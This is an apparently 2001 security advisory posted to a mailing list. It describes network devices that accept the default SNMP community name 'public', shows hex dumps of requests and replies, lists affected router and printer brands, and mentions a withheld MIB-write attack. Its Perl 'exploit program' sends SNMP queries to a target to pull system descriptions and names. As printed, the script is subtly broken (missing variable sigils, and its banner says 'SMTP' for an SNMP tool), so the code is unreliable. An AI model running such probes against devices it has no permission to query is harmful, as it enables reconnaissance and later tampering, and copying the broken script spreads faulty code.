-={[ SNMP supporting network devices vulnerability exploit ]}=-
                               english edition

-=<( Authors

    VBh // underlings
    Privacy // underlings

-=<( Authors' requisites

    format : ASCII, 80 characters per string
    date : 2001, April 3rd
    feedback : privacychat.ru

-=<( Introduction

    SNMP (Simple Network Management Protocol) is supported by a huge amount
of network devices (such as, for example, network printer adapters, routers,
etc). One of the rfc documents that specify SNMP protocol, proclaims
aproximately following: "a network device may be considered completely operated
if it implements SNMP protocol".

    Following SNMP standard, the whole information required to operate a
remote network device is being kept directly in its memory, in MIB (Management
Information Base). As itself, SNMP protocol represents a user level interface
to control a remote MIB.

    While performing a remote SNMP request, a "community name" option field
is used as an identifier.

    Let us take a slight look at a typical SNMP request:

0000: 20 53 52 43 00 00 44 45 53 54 00 00 08 00 45 00 SRC..DEST....E.
0010: 00 4F 39 00 00 00 80 11 CC CC XX XX XX XX YY YY .O9........"....
0020: YY YY 04 03 00 A1 00 3B CC CC 30 82 00 2F 02 01 .......;..0../..
0030: 00 04 06 49 44 45 4E 54 36 A1 82 00 20 02 02 2C ...IDENT6... ..,
0040: B0 02 01 00 02 01 00 30 82 00 12 30 82 00 0E 06 .......0...0....
0050: 0A 2B 06 01 02 01 02 02 01 02 01 05 00 .+...........

    Here goes an answer for the request performed above:

0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST.. SRC....E.
0010: 00 5D 01 93 00 00 77 11 CC CC YY YY YY YY XX XX .]....w..K....."
0020: XX XX 00 A1 04 03 00 49 CC CC 30 3F 02 01 00 04 .......I.E0?....
0030: 06 49 44 45 4E 54 36 A2 32 02 02 2C B0 02 01 00 .IDENT6.2..,....
0040: 02 01 00 30 26 30 24 06 0D 2B 06 01 02 01 02 02 ...0&0$..+......
0050: 01 02 88 80 80 03 04 13 33 43 6F 6D 20 45 74 68 ........3Com Eth
0060: 65 72 4C 69 6E 6B 20 50 43 49 00 erLink PCI.

    (to keep a desirable privacy, we fill IP header's Source and Destination
IP address fields accordingly with XX.XX.XX.XX and YY.YY.YY.YY; IP and UDP
headers' checksum fields are filled with CC.CC; SNMP request's community name
field contains six bytes of a random string "IDENT6")

    Obviously, we can get an opportunity to interact with a remote MIB only
knowing a "community name" which is set up at a remote SNMP-agent.

-=<( Vulnerability

    It seems that many remote network devices that support SNMP protocol
successfully process a default community name, "public".

    Here goes an SMNP-request that contains a string "public" as a community
name:

0000: 20 53 52 43 00 00 44 45 53 54 00 00 08 00 45 00 SRC..DEST....E.
0010: 00 AD 35 00 00 00 80 11 CC CC XX XX XX XX YY YY ..5........"....
0020: YY YY 04 03 00 A1 00 99 CC CC 30 82 00 8D 02 01 ........) 0.....
0030: 00 04 06 70 75 62 6C 69 63 A0 82 00 7E 02 02 2C ...public......,
      ^^ - "string" type
         ^^ - string length
        ^^ ^^ ^^ ^^ ^^ ^^ - community name
0040: AC 02 01 00 02 01 00 30 82 00 70 30 82 00 0C 06 .......0..p0....
0050: 08 2B 06 01 02 01 01 01 00 05 00 30 82 00 0C 06 .+.........0....
0060: 08 2B 06 01 02 01 01 02 00 05 00 30 82 00 0C 06 .+.........0....
0070: 08 2B 06 01 02 01 01 03 00 05 00 30 82 00 0C 06 .+.........0....
0080: 08 2B 06 01 02 01 01 04 00 05 00 30 82 00 0C 06 .+.........0....
0090: 08 2B 06 01 02 01 01 05 00 05 00 30 82 00 0C 06 .+.........0....
00A0: 08 2B 06 01 02 01 01 06 00 05 00 30 82 00 0C 06 .+.........0....
00B0: 08 2B 06 01 02 01 02 01 00 05 00 .+.........

    After performing a request brought above, we gather the following
reply:

0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST.. SRC....E.
0010: 01 32 01 8F 00 00 77 11 CC CC YY YY YY YY XX XX .2....w..z....."
0020: XX XX 00 A1 04 03 01 1E CC CC 30 82 01 12 02 01 .........)0.....
0030: 00 04 06 70 75 62 6C 69 63 A2 82 01 03 02 02 2C ...public......,
0040: AC 02 01 00 02 01 00 30 81 F6 30 81 8A 06 08 2B .......0..0....+
0050: 06 01 02 01 01 01 00 04 7E 48 61 72 64 77 61 72 .........Hardwar
0060: 65 3A 20 78 38 36 20 46 61 6D 69 6C 79 20 36 20 e: x86 Family 6
0070: 4D 6F 64 65 6C 20 37 20 53 74 65 70 70 69 6E 67 Model 7 Stepping
0080: 20 33 20 41 54 2F 41 54 20 43 4F 4D 50 41 54 49 3 AT/AT COMPATI
0090: 42 4C 45 20 2D 20 53 6F 66 74 77 61 72 65 3A 20 BLE - Software:
00A0: 57 69 6E 64 6F 77 73 20 32 30 30 30 20 56 65 72 Windows 2000 Ver
00B0: 73 69 6F 6E 20 35 2E 30 20 28 42 75 69 6C 64 20 sion 5.0 (Build
00C0: 32 31 39 35 20 55 6E 69 70 72 6F 63 65 73 73 6F 2195 Uniprocesso
00D0: 72 20 46 72 65 65 29 30 18 06 08 2B 06 01 02 01 r Free)0...+....
00E0: 01 02 00 06 0C 2B 06 01 04 01 82 37 01 01 03 01 .....+.....7....
00F0: 02 30 0F 06 08 2B 06 01 02 01 01 03 00 43 03 0E .0...+.......C..
0100: 43 76 30 0C 06 08 2B 06 01 02 01 01 04 00 04 00 Cv0...+......
0110: 30 11 06 08 2B 06 01 02 01 01 05 00 04 05 55 4D 0...+.........UM
0120: 50 52 55 30 0C 06 08 2B 06 01 02 01 01 06 00 04 PRU0...+........
0130: 00 30 0D 06 08 2B 06 01 02 01 02 01 00 02 01 02 .0...+..........

    Here goes a little program written in perl that implements a remote MIB
interviewing via "public" used as a community name:

-=<( Exploit program

use IO::Socket;
use strict;

print "SMTP analyzer via community name 'public' done by VBh // underlings\n";

my($sock, $host, $pkt, $msg, $port, $ipaddr, $hishost,
   $MAXLEN, $Lport,$DSTport, $TIMEOUT, $community, $oid);

$community="public";

$MAXLEN = 1024;
$Lport = 5151;
my str= ("sysDescr","sysObjectID","sysUpTime","sysContact","sysName",
"sysLocation", "sysServices");

unless (ARGV == 2) { die "usage: $0 <host> <port>" }
($host, $DSTport) = ARGV;

for (my $i=1; $i<=7; $i++) {
$oid="\x2B\x06\x01\x02\x01\x01".chr($i);

$pkt = "\x30".chr(length($community)+length($oid)+25)."\x02\x01\x00".
       "\x04\x06".$community.
       "\xA0\x19\x02\x01\x00\x02\x01\x00".
       "\x02\x01\x00\x30\x0E\x30\x0C\x06".
       chr(length($oid)+1).$oid."\x00".
       "\x05\x00";

$sock = IO::Socket::INET->new (Proto => 'udp',
                               LocalPort => $Lport+$i,
                               PeerPort => $DSTport,
                               PeerAddr => $host) ||
 die "Creating socket: $!\n";

$sock->send($pkt) || die "send: $!";

while ($sock->recv($msg, $MAXLEN)) {
print "$host $str[$i-1]: ".unpack("x40 A*", $msg)."\r\n";
shutdown ($sock, 2);
}}

-=<( Statistics

    It wasn't our purpose to collect a huge statistics list concerning this
vulnerability. Here is a small remote systems list we have already tested this
vulnerability at:

    - 3Com routers (SuperStack II), various 3Com network adapters
    - Cisco routers
    - Templex routers
    - Hewlett Packard network printers
    - Xerox network printers

    We suppose, under a certain persistence, this list may be greatly
expanded.

-=<( Destructive possibility

     Besides this all said above, there are some network devices that afford a
possibility to produce records in its MIBs. All our tests we performed on the
whole straightedge of Hewlett Packard network printers confirmed this
supposition.

    Under the comprehensible reasons, we won't publish an exploit program
that implements this destructive possibility.

-=<( Additional information

Basic rfc documents which specify SNMP and MIB II concepts:

    1) 1157, "A Simple Network Management Protocol (SNMP)". You may easily
find a sufficient amount of information concerning SNMP protocol programming
stuff.
    2) 1213, "Management Information Base for Network Management of
TCP/IP-based internets: MIB-II"

Additional rfcs:

    3) 1067, 1098, 1158, 1161, 1212, 1239, 1303, 1351, 1352, 1354, 1441,
1442, 1443, 1444, 1445, 1446, 1447, 1448, 1449, 1450, 1573, 1901, 1902, 1903,
1904, 1905, 1906, 1907, 1908, 1909, 1910, 2011, 2012, 2013

    You may also find some sence in searching for the native snmp agents and
managers documentation and programs.

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]